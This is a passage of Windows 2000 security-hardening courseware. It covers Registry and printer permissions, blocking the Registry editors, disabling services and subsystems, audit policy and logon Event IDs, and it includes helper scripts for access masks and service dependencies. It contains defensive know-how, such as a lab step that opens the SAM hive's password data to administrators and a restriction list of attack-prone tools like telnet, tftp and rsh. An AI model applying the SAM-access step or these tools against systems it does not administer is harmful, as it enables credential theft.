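RESULTS = analyze(parse_inf(TEMPLATE), parse_inf(CURRENT))
```

With these samples the password settings all match, Account Lockout Threshold matches while the other two lockout values do not (the pattern seen in step 15 above), RestrictAnonymous is flagged because the machine still has 0, and SeBackupPrivilege is reported as not in the template rather than as a failure. Run findings(RESULTS) to list only the rows that need attention.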

If you have not created boot floppies for this task, provide students with blank disks and have them create their own.


Windows 2000 Printer Security

When you are setting up the security options on a printer in Windows 2000, you have three permissions that you can apply: Print, Manage Printers, and Manage Documents.

• The default level of security provided to users is Print, meaning that they are given the right to print, and to pause, resume, restart, and cancel the documents that they themselves have submitted to the printer.

• If you want to provide users with more control over a printer, you can give them the Manage Documents permission. This level means that they are given the right to pause, resume, restart, and cancel all documents that have been submitted to this printer, regardless of who owns them.

• If you want to provide users, such as junior administrators or persons responsible for overall printer management, with even more control, you can give them the Manage Printers permission. This means that they are given the right to share the printer, change printer permissions, change printer properties, and delete the printer.

Although setting permissions can provide the security you require, you can get still more control over the printer. In the Advanced settings of a printer, you can define the hours during which the printer is available. If the printer is to be used only during business hours, there is no reason to leave it available 24x7. This type of control helps to keep the device used for business purposes only.

In addition to securing the printer, you must take care to secure the spool folder that holds print jobs waiting to print. By default it is %systemroot%\System32\spool\PRINTERS, and its default permissions allow Everyone Full Control, so any user can read or tamper with other users' queued jobs. Move the spool folder (Print Server Properties, Advanced tab) to a location on an NTFS volume that you manage individually, and restrict its permissions there.

Windows 2000 Registry Security

The Registry stores the configuration data for the computer and, as such, is obviously a critical item to secure properly. Thankfully, users will not have the same level of interaction with the Registry as they will with network resources.

The Windows 2000 Registry can be directly manipulated with the same tools as the Windows NT 4.0 Registry: Regedit.exe and Regedt32.exe. As mentioned earlier, Regedt32.exe is the one to use for security work, because only it can apply permissions and auditing to individual keys. When setting the primary permissions in the Registry, however, you have only Read and Full Control to choose from.


The permissions that are available for the Registry are different from the permissions used for securing files. The following list contains the specific permissions that apply to Registry keys:

• Query Value: Ask for and receive the values stored in a key.

• Set Value: Create or change a value in the key.

• Create Subkey: Create a subkey.

• Enumerate Subkeys: List the subkeys.

• Notify: Register to be told when the key or its subtree changes. (It has nothing to do with auditing; the ability to change a key's audit settings comes from the Manage Auditing And Security Log user right.)

• Create Link: Create a symbolic link from this key to some other key.

• Write DAC: Change the key's permissions.

• Read Control: Read the key's security descriptor, which includes its owner and its permissions.

• Write Owner: Change ownership of the key.

• Delete: Delete the key.

Of the two permissions offered on the primary page, Full Control is the equivalent of all the permissions listed. The Read permission is the equivalent of Query Value, Notify, Read Control, and Enumerate Subkeys. The listing for the Read permission can be a bit misleading at times.

There is no Special Access Permission listing on the primary Permissions page, but there is an Advanced button. If a user has the Read box checked, review the Special Access Permissions to be sure of the exact permissions given to that user. On the same page as the special permissions are the settings for where this set of permissions is to be applied: This Key Only, This Key And Subkeys, or Subkeys Only.
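To see exactly what lies behind a Read or Full Control check box, it helps to work at the level Windows does: an access mask whose bits are the specific rights listed above plus the standard rights that every securable object has. The following script, added here as an example and not part of the course, composes and decodes those masks using the KEY_* and standard-right constants from the Windows SDK, labels a mask the way Regedt32's primary page would, and parses the SDDL strings in which security templates ([Registry Keys] section) express Registry ACLs. The sample SDDL string is constructed; KA, KR, KW and the two-letter SID aliases are the SDDL abbreviations, and the function names are mine.

```python
"""Compose, decode and label Registry access masks, and read the SDDL form
that security templates use for Registry ACLs.  Example code added here,
not from the course.  Constants are the Windows SDK (winnt.h) values."""
import re

KEY_RIGHTS = {                      # key-specific rights, low 16 bits
    "Query Value": 0x0001, "Set Value": 0x0002, "Create Subkey": 0x0004,
    "Enumerate Subkeys": 0x0008, "Notify": 0x0010, "Create Link": 0x0020,
}
STANDARD_RIGHTS = {                 # shared by every securable object
    "Delete": 0x00010000, "Read Control": 0x00020000,
    "Write DAC": 0x00040000, "Write Owner": 0x00080000,
    "Synchronize": 0x00100000,
}
ALL_RIGHTS = {**KEY_RIGHTS, **STANDARD_RIGHTS}


def mask_for(*names):
    """OR together the named rights."""
    mask = 0
    for name in names:
        mask |= ALL_RIGHTS[name]
    return mask


# The SDK's composite masks, built from the pieces above.
KEY_READ = mask_for("Read Control", "Query Value", "Enumerate Subkeys", "Notify")  # 0x20019
KEY_WRITE = mask_for("Read Control", "Set Value", "Create Subkey")                 # 0x20006
KEY_ALL_ACCESS = mask_for(*ALL_RIGHTS) & ~STANDARD_RIGHTS["Synchronize"]           # 0xF003F


def decode(mask):
    """Names of the rights present in mask, plus any bits we do not know."""
    names = sorted(n for n, bit in ALL_RIGHTS.items() if mask & bit)
    unknown = mask & ~mask_for(*ALL_RIGHTS)
    if unknown:
        names.append(f"unknown:0x{unknown:x}")
    return names


def label(mask):
    """What Regedt32's primary Permissions page would show for this mask."""
    if mask == KEY_ALL_ACCESS:
        return "Full Control"
    if mask == KEY_READ:
        return "Read"
    return "Special Access"


# SDDL abbreviations used in template [Registry Keys] lines.
SDDL_RIGHTS = {"KA": KEY_ALL_ACCESS, "KR": KEY_READ, "KW": KEY_WRITE, "KX": KEY_READ}
SDDL_SIDS = {"BA": "Administrators", "BU": "Users", "PU": "Power Users",
             "SY": "SYSTEM", "CO": "CREATOR OWNER", "WD": "Everyone",
             "AU": "Authenticated Users", "AN": "ANONYMOUS LOGON"}
ACE_TYPES = {"A": "allow", "D": "deny", "AU": "audit"}
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_sddl_dacl(sddl):
    """Parse the D: part of an SDDL string into a list of ACE dicts."""
    body = sddl.split("D:", 1)[1].split("S:", 1)[0]   # skip O:/G:, drop the SACL
    aces = []
    for m in ACE_RE.finditer(body):
        ace_type, flags, rights, _obj, _inh_obj, sid = m.group(1).split(";")
        mask = int(rights, 16) if rights.lower().startswith("0x") else SDDL_RIGHTS[rights]
        aces.append({
            "type": ACE_TYPES[ace_type],
            "flags": [flags[i:i + 2] for i in range(0, len(flags), 2)],
            "mask": mask,
            "rights": decode(mask),
            "trustee": SDDL_SIDS.get(sid, sid),
        })
    return aces


# Constructed SDDL in the shape a template uses for a key under HKLM\SOFTWARE.
SAMPLE_SDDL = "D:PAR(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;KR;;;BU)(A;CIIO;KA;;;CO)"
SAMPLE_ACES = parse_sddl_dacl(SAMPLE_SDDL)
```

Decoding KEY_READ shows why the Read box is "misleading": it carries Read Control and Notify, not just Query Value, and any entry whose mask differs by a single bit drops back to Special Access even though the difference may be invisible on the primary page.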

Default Registry Configurations

Earlier, we discussed the mechanisms Windows puts in place to help protect system files. There are also default protections on the Registry. Administrators and the SYSTEM account have Full Control over almost all of the Registry; the notable exceptions are the SAM and SECURITY hives, which only SYSTEM can read by default and which Administrators can open only after granting themselves access, as the next task shows.

Power Users are given permission to create subkeys in the HKEY_LOCAL_MACHINE\SOFTWARE key, which has the effect of allowing them to install new software packages. Power Users then have Full Control over the subkeys they create, as does the CREATOR OWNER account. The extent of control for Power Users does not expand into all areas of the Registry. For example, in the HARDWARE hive, Power Users are not on the permissions list by default.

When changing areas of the Registry, be sure that you have planned the changes carefully, as unintended consequences can happen very easily and quickly. In the following task, you will configure permissions on an area of the Registry.

audit: The independent examination of records and activities to ensure compliance with established controls, policy, and operational procedures, and to recommend any indicated changes in controls, policy, or procedures.


TASK 4D-2
Setting Registry Permissions

1. Log on to Windows 2000 as the renamed Administrator account.

2. Open Regedt32 to prepare for setting permissions on the Registry.

3. Select the HKEY_LOCAL_MACHINE window.

4. Expand HKEY_LOCAL_MACHINE\SAM, and observe that its SAM subkey is grayed out: Administrators hold no Read permission on it by default.

5. Select the grayed-out SAM subkey, and choose Security→Permissions.

6. In the Permissions list, give the Administrators group Full Control. Click OK. (This works because Administrators can change the key's permissions even though they cannot read it, which is why the default restriction is a speed bump for administrators rather than a wall.)

7. Expand the SAM subkey to verify that user names and account information are now visible to you. Because this change exposes the local account database, including password hashes, to every member of Administrators and to any program they run, remove the Administrators entry again once you have finished the task.

Registry Backup

Part of securing the Registry is having a backup strategy for the organization. There are several ways to back up the Registry:

• The first is in the Registry Editor itself: Regedt32 can save a key and its subkeys to a hive file. If you are going to use this built-in option, be sure that you secure the saved files very well; a saved hive contains everything the key contained, in the clear.

• If you do not want to use the save option in the Registry Editor, you can use the Microsoft Backup program (ntbackup). This utility can create a backup of the System State, which includes the Registry. Just as with saved keys, where you store the backups is critical. A compromised System State backup can be almost as devastating as a compromise of the server itself, since it contains the SAM and SECURITY hives.

The final location to secure with regard to Registry backups is in the OS files. The %systemroot%\repair folder holds copies of the Registry hives taken during Setup, and its RegBack subfolder receives fresh copies whenever an Emergency Repair Disk is created with the Also Back Up The Registry option. These copies include the SAM, which is why attackers with read access to the repair folder harvest it for offline password cracking. Restrict the folder to Administrators and SYSTEM.

TASK 4D-3
Saving Registry Information

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Regedt32 is running.

1. Select the Software subkey of HKEY_LOCAL_MACHINE.

2. Choose Registry→Save Key.

3. Create a folder named Reg_Keys on the Windows 2000 partition.

4. For the file name, enter Soft_One, and click Save.


5. Close the Registry Editor.

6. Open My Computer, and navigate to the Reg_Keys folder that you created.

7. Right-click the folder, and choose Properties. Select the Security tab.

8. Set the security so that only your user account has Full Control, and remove all access for every other user account or group.

9. Close all open windows.

Blocking Access to the Registry

You might want to apply normal NTFS controls to programs such as Regedit.exe and Regedt32.exe to prevent unauthorized users from executing them. A more drastic step is to remove the applications from the hard drive and perform Registry management of the machine remotely; bear in mind, though, that both editors are protected system files, so Windows File Protection will put them back unless the copies in %systemroot%\System32\dllcache are removed as well. If deleting the executables is still not enough for your needs, you can edit the Registry to disable the Registry editing tools. Obviously, this can be a dangerous option, as you are literally disabling Registry editing tools on the local machine. You will have no choice other than remote management at that stage, so make sure that you can perform remote management (the Remote Registry Service running on the target, and administrative rights on it from the other machine) before taking this action. Understand also what this policy is: a flag that Regedit and Regedt32 check when they start. It does not stop command-line tools such as reg.exe or regini.exe from the Resource Kit, scripts, or any program that calls the Registry API, so treat it as protection against casual editing rather than as an access control.

TASK 4D-4
Blocking Registry Access

Setup: You are logged on to Windows 2000 as the renamed Administrator account. For this task, you should again work in pairs, with one partner observing as the other completes the task, and then reversing the roles.

1. Open Regedit, and navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies.

2. Right-click Policies, and add a new key called System.

3. In the right pane, right-click and add a new DWORD value named DisableRegistryTools.

4. Give it a REG_DWORD value of 1. A value of 0 would allow the Registry editing tools. (The same value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System applies the block to a single user, which is how the Group Policy user setting delivers it.)

5. Close the Registry Editor.

6. Attempt to access the Registry with either Regedit or Regedt32. You should not be able to open the Registry Editor. To recover this ability, you will need to access the Registry remotely from another computer, as the rest of this task shows.

If students are unable to re-enable local Registry access, their ability to complete future tasks will be severely affected. You might want to have them back up the entire Registry to a safe place prior to performing this task, or you can skip the task altogether.

To ensure that you will be able to troubleshoot this task, make sure that at least one machine in the classroom setup always has the Registry tools enabled.


7. Create a share of your \WINNT\System32 folder. Allow your remote administration (scnpxxxb) account Full Control, and remove all other permissions for all other users and groups. (Remote Registry editing itself does not need this share; it needs the Remote Registry Service running on your computer and administrative rights for the connecting account. Delete the share when the task is complete.)

8. Switch computers with your neighbor, and access the Registry on your computer. Choose Registry→Connect Network Registry, enter your IP address, and click OK.

9. Expand HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.

10. Set DisableRegistryTools to 0 so that you will again be able to edit the Registry from the local machine.

11. Return to your own computer, and verify that you can open the Registry tools. Notify your instructor if you have trouble completing this step.

12. Close all open windows.

System Hardening

Now that you have seen how to secure resources, including access to the Registry, it is time to secure the base operating system itself. This includes removal of unneeded services, setting security permissions on common executables, disabling unused subsystems, and keeping up to date on Service Packs and Hotfixes.

Disabling Services

On the vast majority of Windows installations, many of the services that are loaded and running by default are neither needed nor appropriate in a secure environment. Every running service is code that accepts input, often from the network, and usually runs as LocalSystem, so each unnecessary one is attack surface to remove. Many of the services are installed with the OS, and others are added as applications are installed on the system.

Figure 4-10: Services that can be managed on a Windows 2000 computer.

Be prepared to troubleshoot. All students must be able to access Registry tools before proceeding to the next activity.


Services can have one of three Startup types: Manual, Automatic, and Disabled.

• Manual means the service does not start when the system boots, but it can be started at any time by an administrator, by an application, or by another service that depends on it. It is therefore not a security control.

• Automatic means the service starts when the system starts.

• Disabled means the service cannot be started at all until you change its Startup type. This is the setting to use for services the machine should not run; merely stopping a service leaves it available to be restarted.

A nice feature in Windows 2000 is the ability to find out what other services are required for a given service to run. These are known as dependencies, and the Dependencies tab of a service's Properties dialog shows both lists: what this service requires, and what requires this service. For example, in order for the Messenger service to run properly, both the Remote Procedure Call (RPC) and the Workstation service must be running. Read the second list before disabling anything: disabling a service that others depend on stops them as well, and those failures surface later and less obviously than a service that simply will not start.

Figure 4-11: Example of service dependencies in Windows 2000.
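Before setting a service to Disabled, you want the second list on the Dependencies tab for the whole chain, not just one level down. The following script, an added example and not part of the course, does that computation over a dependency map: it finds every service that would stop, checks that list against services you must keep, and orders a batch of services so that each is disabled before anything it requires. The map is a constructed, simplified sample in the shape of the DependOnService values Windows keeps under HKLM\SYSTEM\CurrentControlSet\Services (the real Messenger list is longer), and the function names are mine.

```python
"""Work out what breaks before disabling a Windows service.
Example code added here; not from the course.  DEPENDS_ON is a constructed,
simplified sample of the DependOnService values under
HKLM\\SYSTEM\\CurrentControlSet\\Services, not an export from a real host."""
from collections import deque

DEPENDS_ON = {            # service -> services it needs (constructed sample)
    "Messenger": ["LanmanWorkstation", "RpcSs"],
    "Alerter": ["LanmanWorkstation"],
    "Browser": ["LanmanServer", "LanmanWorkstation"],
    "Netlogon": ["LanmanWorkstation"],
    "Spooler": ["RpcSs"],
    "Fax": ["Spooler"],
    "TlntSvr": ["RpcSs"],
    "LanmanServer": [],
    "LanmanWorkstation": [],
    "RpcSs": [],
}


def reverse_graph(depends_on):
    """service -> services that need it (the Dependencies tab's second list)."""
    needed_by = {name: set() for name in depends_on}
    for service, needs in depends_on.items():
        for dep in needs:
            needed_by.setdefault(dep, set()).add(service)
    return needed_by


def dependents(service, depends_on=DEPENDS_ON):
    """Every service that stops, directly or transitively, if `service` stops."""
    needed_by = reverse_graph(depends_on)
    seen, queue = set(), deque([service])
    while queue:
        for nxt in needed_by.get(queue.popleft(), ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def conflicts(service, must_keep, depends_on=DEPENDS_ON):
    """Services in must_keep that disabling `service` would break."""
    return dependents(service, depends_on) & set(must_keep)


def disable_order(to_disable, depends_on=DEPENDS_ON):
    """Order a batch so each service is disabled before anything it requires:
    dependents first, so nothing is left needing a service already gone."""
    needed_by = reverse_graph(depends_on)
    order, done = [], set()

    def visit(name):
        if name in done:
            return
        done.add(name)
        for d in needed_by.get(name, ()):
            if d in to_disable:
                visit(d)
        order.append(name)

    for name in sorted(to_disable):
        visit(name)
    return order
```

On a real host, export the DependOnService values (or read them from the Dependencies tab) into the map; conflicts("LanmanWorkstation", {"Netlogon"}) returning a non-empty set is the kind of answer that should stop a change before it is made on a domain member.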

Securing Common Executables

In hardening the OS, an often-overlooked option is to harden the programs that are commonly used in exploits, typically by an attacker who has gained a foothold and wants to explore or reach the network from the machine. You can increase the security of the system by placing permissions on these applications.


For the applications listed here, you might want to create a new group for the individuals who require access, and then grant that group, the Administrators group, and the System account (shown as LocalSystem on a standalone server) the desired level of permissions on the executables, removing the entries for Users, Power Users, and Everyone. Be aware that altering the permissions on these files can affect applications and scheduled jobs that call them, so adjust as needed if the situation arises. Add to or remove from this list for your unique configuration (rdisk.exe, for instance, is a Windows NT 4.0 tool that Windows 2000 does not ship):

• arp.exe

• at.exe

• attrib.exe

• cacls.exe

• cmd.exe

• command.com

• debug.exe

• dialer.exe

• edit.com

• finger.exe

• ftp.exe

• ipconfig.exe

• nbtstat.exe

• net.exe

• netstat.exe

• nslookup.exe

• ping.exe

• rcp.exe

• rdisk.exe

• regedit.exe

• regedt32.exe

• rexec.exe

• route.exe

• rsh.exe

• runonce.exe

• sysedit.exe

• telnet.exe

• tftp.exe

• tracert.exe

• xcopy.exe


Disabling Subsystems

In Windows 2000, several environment subsystems are installed with the operating system to run software written for other environments; there are subsystems for POSIX and OS/2 applications, for example. Code that nothing on the server uses is attack surface with no return, so you might want to remove the subsystems you will not be using. To do this requires two steps:

1. Edit the Registry to remove the references that tell the Session Manager to load the subsystems you want to disable.

2. Remove the actual files required for the subsystem.

TASK 4D-5
Removing Unneeded Subsystems

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and local Registry editing has been re-enabled.

1. Navigate to \WINNT\System32 and delete the files posix.exe, psxss.exe, os2.exe, os2srv.exe, and os2ss.exe. Windows File Protection will restore them from \WINNT\System32\dllcache unless the copies there are deleted as well, so remove those too.

2. Open the Registry Editor.

3. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems.

4. In this subkey, delete the Posix and Os2 values, and edit the Optional value (a REG_MULTI_SZ) to remove the names Os2 and Posix from it.

5. Close the Registry Editor. The change takes effect at the next restart.

Topic 4E
Windows 2000 Auditing and Logging

In Windows 2000, logging can be very complete, enough so that the average administrator can easily become frustrated sorting through the volumes of information that have been recorded. The information collected is viewed in the Event Viewer tool. The Event Viewer offers three primary logs: the Application Log, the Security Log, and the System Log. In this topic, you will focus on the Security Log.

Although Windows 2000 automatically tracks and records events in the Application and System Logs, no Security Log events are generated until auditing is turned on. To turn on security logging, you must create an Audit Policy.


Configuring the Audit Policy gives you granular control over the specific events that are recorded in the log. For example, you might want to log just attempts to log on and off the system, or only changes to policy options. The following list identifies each policy option and provides a short description:

• Audit Account Logon Events: Logs the validation of an account's credentials by this computer, whichever machine the user is sitting at. For domain accounts this fires on the domain controller (Kerberos ticket requests and NTLM validation); for local accounts, on the machine that holds them.

• Audit Account Management: Logs the creation, change, and deletion of user accounts and groups, including renaming, disabling, enabling, and password changes for a user account.

• Audit Directory Service Access: Logs access to an Active Directory object by a user. In order for this to produce anything, the object itself needs to be configured for auditing.

• Audit Logon Events: Logs users logging on and off at this computer, and network connections to it being made and terminated. Together with Account Logon Events, this tells you both where a credential was validated and where it was used.

• Audit Object Access: Logs access to a file, folder, Registry key, or printer. In order for this to produce anything, the object needs to be configured for auditing.

• Audit Policy Change: Logs changes to the audit policy, to user rights assignments, and to trust relationships.

• Audit Privilege Use: Logs each use of a user right, such as Take Ownership or Back Up Files And Directories, by a user account.

• Audit Process Tracking: Logs process creation and exit, handle duplication, and indirect object access.

• Audit System Events: Logs system events, such as the shutdown or restart of the computer, and events affecting the security log itself, such as the log being cleared.


Figure 4-12: Audit Policy settings of the Local Computer policy.

Object Auditing

To audit access to specific objects such as files, folders, and printers, you need to configure the object itself, in addition to creating the Audit Policy. The auditing section of the object is located on the Security tab of the object's Properties: click the Advanced button, and select the Auditing tab. There you choose the users or groups to audit, the accesses to record, and whether to record successes, failures, or both.

An example of security-related auditing, other than a normal file-access log, is to track access to the System32 folder of the OS. As a critical folder, it can provide relevant security information: which users are accessing its contents, and when. Audit writes and deletes there rather than reads; every process reads System32 constantly, and auditing reads would bury the useful events.

Active Directory Auditing

Just as you can log access to an object like a file or a folder, you can log access to an Active Directory object. The first thing you need to do is enable Audit Directory Service Access in your Audit Policy. Then, select the specific objects that you want to audit.

The object you want to audit must be on an NTFS partition.


In order for the policy to take effect, you have several options.

• One is to wait until the policy propagates at the regular refresh interval. By default that is every 90 minutes, with a random offset of up to 30 minutes, on member computers, and every 5 minutes on domain controllers; the interval can be configured by the administrator.

• Another option is to run the command secedit /refreshpolicy machine_policy at the command prompt, which refreshes the computer policy immediately (add /enforce to reapply the settings even if the policy has not changed).

TASK 4E-1
Enabling Auditing

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. From Administrative Tools, open the Local Security Policy.

2. Expand Local Policies, and select Audit Policy.

3. Double-click Audit Account Logon Events.

4. Check both Success and Failure, and click OK.

5. Double-click Audit Logon Events.

6. Check both Success and Failure, and click OK.

7. Close the Local Security Policy.

8. Open a command prompt, and enter secedit /refreshpolicy machine_policy to force the policy to refresh now.

9. Open the Local Security Policy, and verify that the new settings have taken effect.

10. Close the Local Security Policy.

Registry Auditing

Auditing the Registry can provide critical information in securing the network, and important data in troubleshooting an event. The procedure is the same as for auditing other objects: choose the object, then configure the auditing on it.

Remember that in order to configure auditing of the Registry in Windows 2000, you will need to use Regedt32, not Regedit. Once configured, the audit entries are stored on the key itself and enforced by the kernel, so an access is recorded whichever tool or program makes it, Regedit included.


The options available in auditing the Registry are a bit different from those for auditing a file or folder: they mirror the Registry permissions, such as Query Value or Set Value. The list of accesses that can be audited is shown in Figure 4-13. Some of the auditing options are detailed as follows:

• Query Value: Audit the user or group reading values from the key.

• Set Value: Audit the user or group writing values to the key.

• Create Subkey: Audit the user or group creating a key beneath it.

• Enumerate Subkeys: Audit the user or group listing the keys beneath it.

Figure 4-13: Options for auditing the SAM in the Registry.

These options can be configured for either success or failure. So, if you want to know who has failed in an attempt to read the SAM, you would select the group and audit Query Value failures. Because a program states the access it wants when it opens the key, the denial appears in the Security Log as a failed Object Open event for the key, listing the accesses that were requested.

TASK 4E-2Logging SAM Registry Access

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Create a regular user account called Ordinary, and assign Ord1n8ry? asthe password. Remember to uncheck User Must Change Password OnLogon before clicking Create.

2. Allow the Ordinary user account the right to Log On Locally.


3. Open Regedt32.

4. Navigate to HKEY_LOCAL_MACHINE\SAM.

5. Choose Security→Permissions.

6. Click the Advanced button.

7. Select the Auditing tab.

8. Add the user account Ordinary.

9. For Query Value, check both Successful and Failed, and click OK.

10. Click OK to close the SAM Access Control Settings.

11. Click OK to close the SAM Permissions, and close Regedt32.

12. Log off as the renamed Administrator account, and log on as Ordinary. If you are prompted to save the changes to the console, click No.

13. Open a Registry Editor, and attempt to open the SAM subkey. You should receive an error message. Click OK to clear the message.

14. Close the Registry Editor, and log off.

15. Log back on as the renamed Administrator account. You will examine the Event Viewer logs shortly.

Managing the Event Viewer

In the Event Viewer, you will perform your primary functions in reading and managing the logs of the system. You can also use software to manage the logs and to send the logs to a database for viewing, but at this point, you will work directly in the Event Viewer.

The Event Viewer provides three logs: Application, System, and Security. In the Event Viewer logs, there are five types of events that can be reported. They are Error, Warning, Information, Success Audit, and Failure Audit. You can add components to Event Viewer, based on the applications installed, such as DNS, as shown in Figure 4-14.

The logs are listed in the Viewer with the most current event being the highest on the list. You might need to go up and down the list to follow a sequence of events. You can also sort the columns by clicking any column name.


Figure 4-14: An example of the Event Viewer with a Failure Audit.

The objects that you choose to log will provide three primary sources of information to you:

• The action that was performed.

• The user account that performed the action.

• The success or failure of the event.

You will also be able to learn information, such as the time of the event, names of computers involved, IP addresses of computers involved, and more. In Figure 4-15, you can see an event with the following information:

• The date and time of the event.

• The user account that triggered the event.

• That the event was a failure.

• The name of the computer where the event happened.

• The name of the object that was audited.

From this single detailed log, you are able to say that user account Ordinary, on the computer named INS-W2K-01, at 19:32, on 11/21/2002, tried and failed to access the SAM subkey of the Registry.


Figure 4-15: A failed attempt at accessing a Registry key, logged in Event Viewer.

TASK 4E-3
Viewing the Registry Audit

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open the Event Viewer.

2. Open the Security Log.

3. Locate the Failure Event for your attempted Registry access. If for some reason your Failure Event does not display, review the preceding Concepts section to view an example of one.

4. Compare what you can identify from your log to the previous example. You should be able to identify:

a. User Account

b. Date

c. Time

d. Success or Failure

e. Computer Name

f. Object Accessed

5. Once you have identified these items, close the Event Viewer.


Event IDs

Although at this stage mentioning that you have a series of 529 events, all one minute apart, may not mean anything, you should be comfortable with the primary Event IDs, so that you can quickly be aware of what is happening on the system.

The following table lists common security-related Event IDs. You should become comfortable with these IDs, as you will see them often in your work as a security professional.

Event ID  Description
512       Successful starting of the operating system.
513       Successful shutting down of the operating system.
517       Successful clearing of the Audit Log.
528       Successful logon.
529       Failure of a logon due to unknown username or bad password.
530       Failure of a logon due to account logon-time restrictions.
531       Failure of a logon due to the account being disabled.
540       Successful network logon.
624       Successful creation of a new user account.
626       Successful enabling of a user account.
628       Successful change of a user account's password.
629       Successful disabling of a user account.
644       Successful locking out of a user account.
645       Successful creation of a new computer account.

You can find complete descriptions of Event IDs online in many locations, and from Microsoft at http://support.microsoft.com.

Authentication Logging

In order to bring the overall options in logging down to a smaller subject, you will focus here just on the Authentication process. Windows 2000 can provide extensive logs on all successes and failures of the logon process. This will assist you greatly when investigating security issues and troubleshooting account access.

The following table lists Event IDs that are all directly related to the Authentication process in Windows 2000, and are enabled by choosing Success and Failure of Logon Events in the Audit Policy.

Event ID  Description
528       A successful logon.
529       A failed logon due to unknown user name or bad password.
530       A failed logon due to account logon-time restrictions.
531       A failed logon due to the account being currently disabled.
532       A failed logon due to the account being expired.
533       A failed logon due to the account not being allowed to log on at the computer.
534       A failed logon due to the account not being granted the logon type requested at the computer, such as interactive or network.
535       A failed logon due to the account's password being expired.

536       A failed logon due to NetLogon not being active.
537       A failed logon due to an unexpected error during the logon attempt.
538       A successful logoff of an account.
539       A failed logon due to the account being locked out.
540       A successful network logon.

When you go to examine the details of the Authentication Log, you will find that Logon Type is an entry in the log. There are six different Logon Types:

• Logon Type 2: Interactive

• Logon Type 3: Network

• Logon Type 4: Batch

• Logon Type 5: Service

• Logon Type 6: Proxy

• Logon Type 7: Unlock the Workstation

In addition to the Logon Type that you will find in the log, you will find an entry called the Logon Process. There are seven different Logon Processes, and they are more technical in their description than the previous fields. The Logon Processes are as follows:

• NtLmSsp or MICROSOFT_AUTHENTICATION_PACKAGE_V1_0: msv1_0.dll, the default authentication package

• KSecDD—ksecdd.sys, the security device driver

• User32 or WinLogon\MSGina—winlogon.exe and msgina.dll, the authentication user interface

• SCMgr—The Service Control Manager

• LAN Manager Workstation Service

• advapi—API call to LogonUser

• MS.RADIU—The RADIUS authentication package; a part of the Microsoft Internet Authentication Services (IAS)

Frequently, administrators will use only the Logon Events as described previously. You can add Account Logon Events to your Audit Policy. If you do add this option for Success and Failure, you will see the Event IDs reported, as shown in the following table.

Event ID  Description
672       Successful authentication ticket granted.
673       Successful service ticket granted.
674       Successful ticket granted renewed.
675       Failure of Pre-Authentication.
676       Failure of the authentication ticket request.
677       Failure of the service ticket request.
678       Successful account mapped for logon.
679       Failure of the account being mapped for logon.
680       Successful account used for logon.
681       The logon to account <CLIENT NAME> by <SOURCE> from workstation computername failed. The Error Code was ErrorCode.
682       Successful session reconnected to Winstation.
683       Successful session disconnection from Winstation.

Numbers 0 and 1 are not valid Logon Types.

proxy: A firewall mechanism that replaces the IP address of a host on the internal (protected) network with its own IP address for all traffic passing through it. A software agent that acts on behalf of a user; typical proxies accept a connection from a user, make a decision as to whether or not the user or client IP address is permitted to use the proxy, perhaps does additional authentication, and then completes a connection on behalf of the user to a remote destination.

Note that for Event ID 681, there is a field called ErrorCode. The error codes provide an even higher level of detail on the specifics of an event. The following table defines the Error Code and provides a description of the reason for the logon failure.

Error Code  Description
3221225572  The username provided does not exist.
3221225578  The username provided is correct, but the password is incorrect.
3221226036  The user account is locked out.
3221225586  The user account is disabled.
3221225583  The user account attempted to log on outside the user account's allowed logon hours.
3221225584  The user account attempted to log on from a workstation the account did not have the right to log on from.
3221225875  The user account has expired.
3221225585  The user account attempted to log on using an expired password.
3221226020  The user attempted to log on with a user account where the Administrator has defined the User Must Change Password At Next Logon option.

TASK 4E-4
Creating Events

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open the Event Viewer.

2. Right-click the Security Log and choose Clear All Events.

3. When you are prompted to save the log, click No.

4. Close the Event Viewer.

5. Create a user account using your first name, and f1R5+n@m3 as the password.

6. Grant the new user account the right to log on locally.


7. Lock the computer, while logged on as the renamed Administrator account.

8. Unlock the computer, using the renamed Administrator credentials.

9. Log off the renamed Administrator account.

10. Log on as your newest user account (the one with your first name), using the wrong password. This should fail.

11. Log on as your newest user account, using the correct password. This should be successful.

12. Attempt to connect to another computer in the network. This should fail, as user accounts for other students were not created on your computer, and vice versa.

13. Attempt to connect to another computer in the network as a remote Administrator account with the correct password. This should be successful.

14. Close the network connection, and log off your user account.

15. Log back on as your renamed Administrator account.

Viewing Event Logs

Now that you have created a group of events to analyze, you will run through this process. Try to follow the sequence of events as you triggered them. Watch for the local and network differences in the logs and identify the Event IDs for quick analysis.

TASK 4E-5
Viewing Event Logs

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open the Event Viewer.

2. Open the Security Log and examine the log. You should be able to identify at least one of each of the following:

a. A successful local logon.

b. A successful unlocking of the computer.

c. A successful network logon.

d. A failed local logon attempt.

e. A failed network logon attempt.

To lock the computer, press Ctrl+Alt+Delete, and then click Lock Computer.


3. Identify the Event IDs, Logon Types, and the Error Codes where they apply.

4. Close the Event Viewer.

Managing Log Files

Once you become more comfortable with Event IDs, you will be aware that a series of 529 events can be an indication of a possible attack. However, with all of the events that can happen and all of the data that can be collected, the process of simply viewing and managing the log files can become tedious, and even overwhelming.

There are features built in to the Event Viewer that are designed to help you work with the volumes of data that are collected. In addition to the features of Event Viewer, there are third-party applications that are designed to manage the logs. These applications filter specific events, group them for simplicity, and can notify you in case a defined sequence of events happens.

Event Viewer Features

One of the most straightforward features in the Event Viewer is the Search function. For example, you might be looking for all of the 529 events after a new password policy has been implemented. You need to determine the number of bad logons in comparison to before the policy was put in place. Or, you may suspect that a user account is being attacked and want to search only for 529 events that are related to a certain user account.

